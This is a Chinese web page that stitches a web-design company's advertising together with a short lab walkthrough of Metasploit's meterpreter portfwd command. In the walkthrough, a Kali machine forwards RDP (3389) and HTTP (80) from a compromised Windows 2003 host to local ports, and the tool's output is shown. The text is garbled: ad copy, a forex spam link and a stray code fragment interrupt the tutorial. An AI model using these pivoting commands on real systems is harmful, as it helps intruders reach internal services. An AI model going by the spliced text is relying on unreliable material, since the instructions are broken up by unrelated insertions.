重庆分公司,新征程启航
为企业提供网站建设、域名注册、服务器等服务
Portfwd是一款强大的端口转发工具,支持TCP,UDP,支持IPV4--IPV6的转换转发。 并且内置于meterpreter。 其中exe单版本源码如下:
公司主营业务:成都做网站、成都网站建设、移动网站开发等业务。帮助企业客户真正实现互联网宣传,提高企业的竞争能力。创新互联建站是一支青春激扬、勤奋敬业、活力青春激扬、勤奋敬业、活力澎湃、和谐高效的团队。公司秉承以“开放、自由、严谨、自律”为核心的企业文化,感谢他们对我们的高要求,感谢他们从不同领域给我们带来的挑战,让我们激情的团队有机会用头脑与智慧不断的给客户带来惊喜。创新互联建站推出怀化免费做网站回馈大家。https://github.com/rssnsj/portfwd
复现过程
攻击机: 192.168.1.5 Debian(Kali)
靶 机: 192.168.1.4 Windows7
192.168.1.119 Windows 2003
Sessions -l查看所有msf的连接,看到一条连接到windows 03通信,是从192.168.1.1:455303到192.168.1.119:53
session -l 查看会话
靶机IP为:192.168.1.119---windows 2003---x64
function(){ //外汇跟单www.gendan5.com
需要转发端口为:80,3389
选择连接中的1号,就一条所以就只能选这个了
续上图Portfwd -h查看用法
攻击执行
1 meterpreter > portfwd add ‐ l 33389 ‐ r 192.168.1.119 ‐ p 3389
2 [ * ] Local TCP relay created: : 33389 <‐> 192.168.1.119 : 3389
3 meterpreter > portfwd add ‐ l 30080 ‐ r 192.168.1.119 ‐ p 80
4 [ * ] Local TCP relay created: : 30080 <‐> 192.168.1.119 : 80
5 meterpreter > portfwd
6 Index Local RemoteDirection
7 1 0.0.0.0 : 33389 192.168.1.119 : 3389 Forward
8 2 0.0.0.0 : 30080 192.168.1.119 : 80 Forward
9 2 total active port forwards .
成功